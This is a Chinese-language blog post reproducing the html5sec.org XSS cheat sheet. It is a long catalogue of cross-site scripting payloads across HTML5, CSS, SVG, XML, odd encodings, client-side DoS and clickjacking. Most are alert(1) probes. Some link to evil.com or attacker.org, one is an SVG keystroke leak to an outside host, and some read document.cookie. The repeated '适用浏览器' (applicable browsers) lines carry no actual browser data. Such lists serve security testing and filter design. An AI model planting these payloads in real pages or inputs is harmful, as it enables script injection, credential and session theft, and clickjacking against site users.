XSS备忘录
- 2020 年 2 月 19 日
- 筆記
HTML5特性向量
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
适用浏览器
<input onfocus=write(1) autofocus>
适用浏览器
<input onblur=write(1) autofocus><input autofocus>
适用浏览器
<video poster=javascript:alert(1)//></video>
适用浏览器
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
适用浏览器
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
适用浏览器
<video><source onerror="alert(1)">
适用浏览器
<video onerror="alert(1)"><source></source></video>
适用浏览器
<form><button formaction="javascript:alert(1)">X</button>
适用浏览器
<body oninput=alert(1)><input autofocus>
适用浏览器
<math href="javascript:alert(1)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
适用浏览器
<form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>
适用浏览器
<link rel="import" href="test.svg" />
适用浏览器
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
适用浏览器
<picture><source srcset="x"><img onerror="alert(1)"></picture> <picture><img srcset="x" onerror="alert(1)"></picture> <img srcset=",,,,,x" onerror="alert(1)">
适用浏览器
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null <map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null <svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works <form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form>// window.opener still works <form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button>// window.opener still works <math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math>// window.opener still works
适用浏览器
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe> <a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>
适用浏览器
#Chrome, Opera, Safari and Edge <div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div> <div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss"> <div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss"> # Firefox <div onbeforescriptexecute="alert(1)"></div> <script>1</script> #MSIE10/11 & Edge <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)"> #MSIE10 <div contenteditable onresize="alert(1)"></div> # MSIE11 <div onactivate="alert(1)" id="xss" style="overflow:scroll"></div> <div onfocus="alert(1)" id="xss" style="display:table"> <div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)"> <div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)"> <div id="xss" style="float:left" onfocus="alert(1)"> # Chrome, Opera, Safari <style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div> # Chrome, Opera, Safari <style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div> # Safari <div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
适用浏览器
<details open ontoggle="alert(1)">
适用浏览器
<video src onratechange="alert(1)">
适用浏览器
HTML4和一些老的向量
<frameset onload=alert(1)>
适用浏览器
<table background="javascript:alert(1)"></table>
适用浏览器
<!--<img src="--><img src=x onerror=alert(1)//">
适用浏览器
<comment><img src="</comment><img src=x onerror=alert(1)//">
适用浏览器
<!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(1)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
适用浏览器
<style><img src="</style><img src=x onerror=alert(1)//">
适用浏览器
<li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
适用浏览器
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
适用浏览器
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
适用浏览器
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
适用浏览器
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
适用浏览器
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <embed src="javascript:alert(1)"></embed> // Firefox only
适用浏览器
<b <script>alert(1)//</script>0</script></b>
适用浏览器
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
适用浏览器
<!-- IE 6-8 --> <x '="foo"><x foo='><img src=x onerror=alert(1)//'> <!-- IE 6-9 --> <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
适用浏览器
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
适用浏览器
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
适用浏览器
<object allowscriptaccess="always" data="test.swf"></object>
适用浏览器
[A] <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> [B] <? foo="><x foo='?><script>alert(1)</script>'>"> [C] <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>"> [D] <% foo><x foo="%><script>alert(1)</script>">
适用浏览器
<html> <body> <b>some content without two new line nn</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg --******-- </body> </html>
适用浏览器
<!-- IE 5-9 --> <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script> <!-- IE 10 in IE5-9 Standards mode --> <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
适用浏览器
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
适用浏览器
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
适用浏览器
<img src="x` `<script>alert(1)</script>"` `>
适用浏览器
<img src onerror /" '"= alt=alert(1)//">
适用浏览器
<title onpropertychange=alert(1)></title><title title=></title>
适用浏览器
<!-- IE 5-8 standards mode --> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"> <!-- IE 5-9 standards mode --> <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
适用浏览器
<!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(2)//]> -->
适用浏览器
<script src="/example.comfoo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\example.comfoo.js"></script> // Safari 5.0
适用浏览器
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
适用浏览器
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
适用浏览器
<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
适用浏览器
<frameset onpageshow="alert(1)"> <body onpageshow="alert(1)">
适用浏览器
<applet onerror="alert(1)"></applet>
适用浏览器
基于CSS注入的向量
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
适用浏览器
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
适用浏览器
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
适用浏览器
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
适用浏览器
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
适用浏览器
<style>*[{}@import'test.css?]{color: green;}</style>X
适用浏览器
<div style="font-family:'foo[a];color:red;';">XXX</div>
适用浏览器
<div style="font-family:foo}color=red;">XXX</div>
适用浏览器
<div style="[a]color[b]:[c]red">XXX</div>
适用浏览器
<div style="63	�6f
�006c�0006F
R:�00072 Ed;color�bla:yellow�bla;col��0  or:blue;">XXX</div>
适用浏览器
<// style=x:expression28write(1)29>
适用浏览器
<style>*{x:expression(write(1))}</style>
适用浏览器
<!-- Up to Opera 10.63 --> <div style=content:url(test2.svg)></div> <!-- Up to Opera 11.64 - see link below --> <!-- Up to Opera 12.x --> <div style="background:url(test5.svg)">PRESS ENTER</div>
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>
适用浏览器
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
适用浏览器
<div style="list-style:url(http://foo.f)20url(javascript:alert(1));">X</div>
适用浏览器
XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/red/*)} /* IE 6-7 Standards mode */ </style>
适用浏览器
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
适用浏览器
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
适用浏览器
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
适用浏览器
<x style="background:url('x[a];color:red;/*')">XXX</x>
适用浏览器
纯javascript的向量
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
适用浏览器
<script>({0:#0=alert/#0#/#0#(0)})</script>
适用浏览器
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
适用浏览器
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
适用浏览器
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
适用浏览器
<script> alert`1`; var something = `abc${alert(1)}def`; ``.constructor.constructor`alert`1````; </script>
适用浏览器
E4X向量
<script src="#">{alert(1)}</script>;1
适用浏览器
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
适用浏览器
<b><script<b></b><alert(1)</script </b></b>
适用浏览器
<script<{alert(1)}/></script </>
适用浏览器
DOM属性与方法的攻击向量
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
适用浏览器
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
适用浏览器
基于JSON的向量
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
适用浏览器
SVG内的向量
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
适用浏览器
<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
适用浏览器
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
适用浏览器
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" /> </linearGradient> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
适用浏览器
<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
适用浏览器
<svg><style><img/src=x onerror=alert(1)// </b>
适用浏览器
<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>
适用浏览器
<!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>
适用浏览器
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
适用浏览器
<svg><script> alert`1` <p> <svg><script> alert`1` <p>
适用浏览器
X(HT)ML相关向量
<?xml-stylesheet href="javascript:alert(1)"?><root/>
适用浏览器
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
适用浏览器
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
适用浏览器
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
适用浏览器
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
适用浏览器
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
适用浏览器
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
适用浏览器
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">
适用浏览器
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
适用浏览器
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="alert(1)"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>
适用浏览器
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
适用浏览器
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
适用浏览器
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
适用浏览器
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
适用浏览器
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
适用浏览器
<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
适用浏览器
UTF-7和其它诡异的编码集的向量
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
适用浏览器
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
适用浏览器
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
适用浏览器
客户端DOS向量
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
适用浏览器
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
适用浏览器
<input onblur=focus() autofocus><input>
适用浏览器
HTML behavior和binding相关向量
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
适用浏览器
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
适用浏览器
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
适用浏览器
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>
适用浏览器
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
适用浏览器
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
适用浏览器
<x style="behavior:url(test.sct)">
<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>
适用浏览器
<xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>
适用浏览器
<event-source src="event.php" onload="alert(1)">
<?php header("Content-Type: application/x-dom-event-stream"); die("Event: loadndata: nn"); ?>
适用浏览器
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
适用浏览器
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
适用浏览器
Clickjacking和UI Redressing的向量
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
适用浏览器
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>
适用浏览器
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>
适用浏览器
<script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>
适用浏览器
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>
适用浏览器
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
适用浏览器
<span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>
适用浏览器
<b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
适用浏览器
原文链接:http://www.html5sec.org
Ms08067安全实验室
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:www.ms08067.com
